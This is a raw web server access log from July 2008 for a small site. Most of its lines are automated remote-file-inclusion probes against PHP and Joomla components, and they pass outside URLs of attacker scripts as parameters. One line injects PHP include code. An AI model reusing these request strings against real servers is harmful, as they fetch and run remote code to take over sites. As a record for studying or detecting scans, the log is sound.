85.10.128.148 - - [30/Jul/2008:17:01:25 -0700] "GET /logs//index2.php?x=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
85.10.128.148 - - [30/Jul/2008:17:01:25 -0700] "GET /logs/access.log//index2.php?x=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
85.10.128.148 - - [30/Jul/2008:17:01:27 -0700] "GET //index2.php?x=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
85.10.128.148 - - [30/Jul/2008:17:01:30 -0700] "GET /logs/access.log//index2.php?x=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
85.10.128.148 - - [30/Jul/2008:17:01:31 -0700] "GET //index2.php?x=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
85.10.128.148 - - [30/Jul/2008:17:01:31 -0700] "GET /logs//index2.php?x=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.146.61.130 - - [30/Jul/2008:17:02:53 -0700] "GET /logs//index2.php?x=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.146.61.130 - - [30/Jul/2008:17:02:53 -0700] "GET /logs/access.log//index2.php?x=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.146.61.130 - - [30/Jul/2008:17:02:53 -0700] "GET /logs/access.log//index2.php?x=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.146.61.130 - - [30/Jul/2008:17:02:53 -0700] "GET //index2.php?x=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.146.61.130 - - [30/Jul/2008:17:02:58 -0700] "GET //index2.php?x=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.146.61.130 - - [30/Jul/2008:17:02:58 -0700] "GET /logs//index2.php?x=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
153.19.161.46 - - [30/Jul/2008:17:15:23 -0700] "GET /logs/access.log//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.kupc.org/zero/bbs//skin/zero_vote/ooid.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sojewels.com"
153.19.161.46 - - [30/Jul/2008:17:15:26 -0700] "GET //components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.kupc.org/zero/bbs//skin/zero_vote/ooid.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sojewels.com"
74.55.113.226 - - [30/Jul/2008:17:18:14 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
74.55.113.226 - - [30/Jul/2008:17:18:14 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
74.55.113.226 - - [30/Jul/2008:17:18:14 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
74.55.113.226 - - [30/Jul/2008:17:18:14 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
74.55.113.226 - - [30/Jul/2008:17:18:14 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
74.55.113.226 - - [30/Jul/2008:17:18:14 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
205.134.252.10 - - [30/Jul/2008:17:18:26 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
205.134.252.10 - - [30/Jul/2008:17:18:26 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
205.134.252.10 - - [30/Jul/2008:17:18:27 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
72.55.146.215 - - [30/Jul/2008:17:22:19 -0700] "GET /logs/access.log/index.php?body=http://www.geocities.com/sak4w/taf/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
72.55.146.215 - - [30/Jul/2008:17:22:19 -0700] "GET /index.php?body=http://www.geocities.com/sak4w/taf/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
72.55.146.215 - - [30/Jul/2008:17:22:19 -0700] "GET /logs/index.php?body=http://www.geocities.com/sak4w/taf/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
62.112.193.46 - - [30/Jul/2008:17:23:27 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
62.112.193.46 - - [30/Jul/2008:17:23:27 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
62.112.193.46 - - [30/Jul/2008:17:23:27 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
202.181.236.33 - - [30/Jul/2008:17:24:03 -0700] "GET /logs/access.log/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.proostjes.be/calendar/help01.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
202.181.236.33 - - [30/Jul/2008:17:24:03 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.proostjes.be/calendar/help01.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
202.181.236.33 - - [30/Jul/2008:17:24:03 -0700] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.proostjes.be/calendar/help01.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
202.179.180.45 - - [30/Jul/2008:17:24:22 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" "www.sojewels.com"
202.179.180.45 - - [30/Jul/2008:17:24:28 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" "www.sojewels.com"
201.130.79.132 - - [30/Jul/2008:17:28:49 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://geo.ya.com/v3g3t4/x6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
201.130.79.132 - - [30/Jul/2008:17:28:49 -0700] "GET /logs/access.log/components/com_facileforms/facileforms.frame.php?ff_compath=http://geo.ya.com/v3g3t4/x6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
201.130.79.132 - - [30/Jul/2008:17:28:49 -0700] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://geo.ya.com/v3g3t4/x6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
66.34.204.26 - - [30/Jul/2008:17:33:49 -0700] "GET / HTTP/1.1" 200 779 "http://www.keywordspy.com/keyword-research/sojewels.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Alexa Toolbar)" "sojewels.com"
66.34.204.26 - - [30/Jul/2008:17:33:49 -0700] "GET / HTTP/1.1" 200 779 "http://www.keywordspy.com/keyword-research/sojewels.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Alexa Toolbar)" "sojewels.com"
66.34.204.26 - - [30/Jul/2008:17:33:49 -0700] "GET / HTTP/1.1" 200 779 "http://www.keywordspy.com/keyword-research/sojewels.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Alexa Toolbar)" "sojewels.com"
89.159.202.119 - - [30/Jul/2008:17:34:16 -0700] "GET /logs/access.log HTTP/1.0" 200 9003 "-" "Lynx/2.8.6rel.5 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8e" "www.sojewels.com"
190.81.184.98 - - [30/Jul/2008:17:35:11 -0700] "GET /logs/access.log/vwar/includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.sv-haslach.com/modules/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
190.81.184.98 - - [30/Jul/2008:17:35:11 -0700] "GET /vwar/includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.sv-haslach.com/modules/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
190.81.184.98 - - [30/Jul/2008:17:35:11 -0700] "GET /logs/vwar/includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.sv-haslach.com/modules/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
85.10.128.148 - - [30/Jul/2008:17:41:48 -0700] "GET /logs/access.log//index.php?ort=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
85.10.128.148 - - [30/Jul/2008:17:41:49 -0700] "GET //index.php?ort=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
85.10.128.148 - - [30/Jul/2008:17:41:49 -0700] "GET /logs//index.php?ort=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
62.65.34.76 - - [30/Jul/2008:17:42:18 -0700] "GET /inc/functions.inc.php?config[ppa_root_path]=http://www.klaus-schumacher.de/cmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.sojewels.com"
62.65.34.76 - - [30/Jul/2008:17:42:18 -0700] "GET /logs/inc/functions.inc.php?config[ppa_root_path]=http://www.klaus-schumacher.de/cmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.sojewels.com"
200.146.61.130 - - [30/Jul/2008:17:42:20 -0700] "GET /logs/access.log//index.php?ort=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.146.61.130 - - [30/Jul/2008:17:42:20 -0700] "GET /logs//index.php?ort=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.146.61.130 - - [30/Jul/2008:17:42:20 -0700] "GET //index.php?ort=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.251.137.2 - - [30/Jul/2008:17:48:01 -0700] "GET /logs/access_080501.log/Exchange/include.php?webappcfg[APPPATH]=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sojewels.com"
200.251.137.2 - - [30/Jul/2008:17:48:01 -0700] "GET /Exchange/include.php?webappcfg[APPPATH]=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sojewels.com"
200.251.137.2 - - [30/Jul/2008:17:48:02 -0700] "GET /logs/Exchange/include.php?webappcfg[APPPATH]=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sojewels.com"
200.251.137.2 - - [30/Jul/2008:17:48:10 -0700] "GET /Exchange/include.php?webappcfg[APPPATH]=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sojewels.com"
200.251.137.2 - - [30/Jul/2008:17:48:11 -0700] "GET /logs/Exchange/include.php?webappcfg[APPPATH]=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sojewels.com"
221.144.12.141 - - [30/Jul/2008:17:53:12 -0700] "GET //config/dbutil.bck.php?confdir=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
216.239.0.245 - - [30/Jul/2008:17:54:53 -0700] "GET ///?path[docroot]=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 200 780 "-" "libwww-perl/5.79" "www.sojewels.com"
216.239.0.245 - - [30/Jul/2008:17:54:53 -0700] "GET /logs/access.log///?path[docroot]=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
216.239.0.245 - - [30/Jul/2008:17:54:53 -0700] "GET /logs///?path[docroot]=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 200 1802 "-" "libwww-perl/5.79" "www.sojewels.com"
89.218.85.18 - - [30/Jul/2008:17:56:43 -0700] "GET /logs/access_080501.log//?path%5Bdocroot%5D=http://macguru.us/guild/forum/images/icons/tools/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
89.218.85.18 - - [30/Jul/2008:17:56:44 -0700] "GET //?path%5Bdocroot%5D=http://macguru.us/guild/forum/images/icons/tools/sistem.gif? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.sojewels.com"
89.218.85.18 - - [30/Jul/2008:17:56:44 -0700] "GET /logs//?path%5Bdocroot%5D=http://macguru.us/guild/forum/images/icons/tools/sistem.gif? HTTP/1.1" 200 1801 "-" "libwww-perl/5.805" "www.sojewels.com"
190.81.184.98 - - [30/Jul/2008:17:56:53 -0700] "GET /logs/access.log/vwar/includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.sv-haslach.com/modules/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
190.81.184.98 - - [30/Jul/2008:17:56:53 -0700] "GET /vwar/includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.sv-haslach.com/modules/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
190.81.184.98 - - [30/Jul/2008:17:56:54 -0700] "GET /logs/vwar/includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.sv-haslach.com/modules/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
74.6.8.97 - - [30/Jul/2008:18:00:28 -0700] "GET /logs/access_080531.log HTTP/1.0" 200 17894689 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sojewels.com"
75.127.70.16 - - [30/Jul/2008:18:01:18 -0700] "GET /logs/access.log/?sourcedir=http://www.pne.de/contenido/cronjobs/v6-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
75.127.70.16 - - [30/Jul/2008:18:01:18 -0700] "GET /?sourcedir=http://www.pne.de/contenido/cronjobs/v6-id.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.811" "www.sojewels.com"
75.127.70.16 - - [30/Jul/2008:18:01:18 -0700] "GET /logs/?sourcedir=http://www.pne.de/contenido/cronjobs/v6-id.txt??? HTTP/1.1" 200 1796 "-" "libwww-perl/5.811" "www.sojewels.com"
75.127.70.16 - - [30/Jul/2008:18:06:02 -0700] "GET /logs/access_080131.log/?sourcedir=http://www.pne.de/contenido/cronjobs/v6-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
74.54.108.98 - - [30/Jul/2008:18:07:43 -0700] "GET /logs/access.log/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sojewels.com"
74.54.108.98 - - [30/Jul/2008:18:07:43 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sojewels.com"
70.84.182.98 - - [30/Jul/2008:18:07:49 -0700] "GET /logs/access.log/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sojewels.com"
70.84.182.98 - - [30/Jul/2008:18:07:49 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sojewels.com"
201.130.79.130 - - [30/Jul/2008:18:08:07 -0700] "GET /logs/access.log/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sojewels.com"
201.130.79.130 - - [30/Jul/2008:18:08:07 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sojewels.com"
195.42.160.22 - - [30/Jul/2008:18:08:07 -0700] "GET /logs/access.log/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sojewels.com"
195.42.160.22 - - [30/Jul/2008:18:08:08 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sojewels.com"
203.22.204.188 - - [30/Jul/2008:18:08:11 -0700] "GET /logs/access.log/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sojewels.com"
203.22.204.188 - - [30/Jul/2008:18:08:11 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sojewels.com"
70.84.182.98 - - [30/Jul/2008:18:08:29 -0700] "GET /logs/access.log/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
70.84.182.98 - - [30/Jul/2008:18:08:30 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
70.84.182.98 - - [30/Jul/2008:18:08:30 -0700] "GET /logs/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
74.54.108.98 - - [30/Jul/2008:18:08:39 -0700] "GET /logs/access.log/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
74.54.108.98 - - [30/Jul/2008:18:08:39 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
74.54.108.98 - - [30/Jul/2008:18:08:39 -0700] "GET /logs/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
195.42.160.22 - - [30/Jul/2008:18:08:44 -0700] "GET /logs/access.log/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.sojewels.com"
195.42.160.22 - - [30/Jul/2008:18:08:44 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.sojewels.com"
195.42.160.22 - - [30/Jul/2008:18:08:44 -0700] "GET /logs/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.sojewels.com"
203.22.204.188 - - [30/Jul/2008:18:08:44 -0700] "GET /logs/access.log/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
203.22.204.188 - - [30/Jul/2008:18:08:44 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
203.22.204.188 - - [30/Jul/2008:18:08:45 -0700] "GET /logs/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
201.130.79.130 - - [30/Jul/2008:18:08:55 -0700] "GET /logs/access.log/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
201.130.79.130 - - [30/Jul/2008:18:08:56 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
201.130.79.130 - - [30/Jul/2008:18:08:56 -0700] "GET /logs/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
85.214.41.164 - - [30/Jul/2008:18:09:07 -0700] "GET /logs/access.log/errors.php?error=http://www.scriptsfeed.com/demos/auction_soft_1/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
85.214.41.164 - - [30/Jul/2008:18:09:07 -0700] "GET /errors.php?error=http://www.scriptsfeed.com/demos/auction_soft_1/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
85.214.41.164 - - [30/Jul/2008:18:09:07 -0700] "GET /logs/errors.php?error=http://www.scriptsfeed.com/demos/auction_soft_1/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
190.81.184.98 - - [30/Jul/2008:18:09:50 -0700] "GET /logs/access_080301.log/vwar/includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.sv-haslach.com/modules/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
201.130.79.130 - - [30/Jul/2008:18:09:53 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
70.84.182.98 - - [30/Jul/2008:18:10:05 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
195.42.160.22 - - [30/Jul/2008:18:10:12 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.sojewels.com"
74.54.108.98 - - [30/Jul/2008:18:10:16 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
203.22.204.188 - - [30/Jul/2008:18:10:39 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
208.98.1.12 - - [30/Jul/2008:18:10:41 -0700] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.cafelecaire.com/gallery/data/idd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.sojewels.com"
208.98.1.12 - - [30/Jul/2008:18:10:41 -0700] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.cafelecaire.com/gallery/data/idd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.sojewels.com"
74.54.108.98 - - [30/Jul/2008:18:10:52 -0700] "GET /logs/errors.php?error=http://legalref.ru/config/idfx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sojewels.com"
74.54.108.98 - - [30/Jul/2008:18:10:52 -0700] "GET /logs/access.log/errors.php?error=http://legalref.ru/config/idfx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sojewels.com"
74.54.108.98 - - [30/Jul/2008:18:10:52 -0700] "GET /errors.php?error=http://legalref.ru/config/idfx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sojewels.com"
87.244.11.20 - - [30/Jul/2008:18:11:11 -0700] "GET /logs/errors.php?error=http://dantman.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.sojewels.com"
87.244.11.20 - - [30/Jul/2008:18:11:12 -0700] "GET /errors.php?error=http://dantman.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.sojewels.com"
83.12.119.178 - - [30/Jul/2008:18:11:46 -0700] "GET /logs/access.log//atom.php5?page=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sojewels.com"
83.12.119.178 - - [30/Jul/2008:18:11:55 -0700] "GET //atom.php5?page=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sojewels.com"
67.19.204.226 - - [30/Jul/2008:18:12:53 -0700] "GET /logs/access.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
67.19.204.226 - - [30/Jul/2008:18:12:53 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
67.19.204.226 - - [30/Jul/2008:18:12:53 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
221.144.12.141 - - [30/Jul/2008:18:18:27 -0700] "GET /logs/access_080501.log//config/dbutil.bck.php?confdir=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
221.144.12.141 - - [30/Jul/2008:18:18:28 -0700] "GET //config/dbutil.bck.php?confdir=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
221.144.12.141 - - [30/Jul/2008:18:18:28 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
83.12.119.178 - - [30/Jul/2008:18:18:47 -0700] "GET //atom.php5?page=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
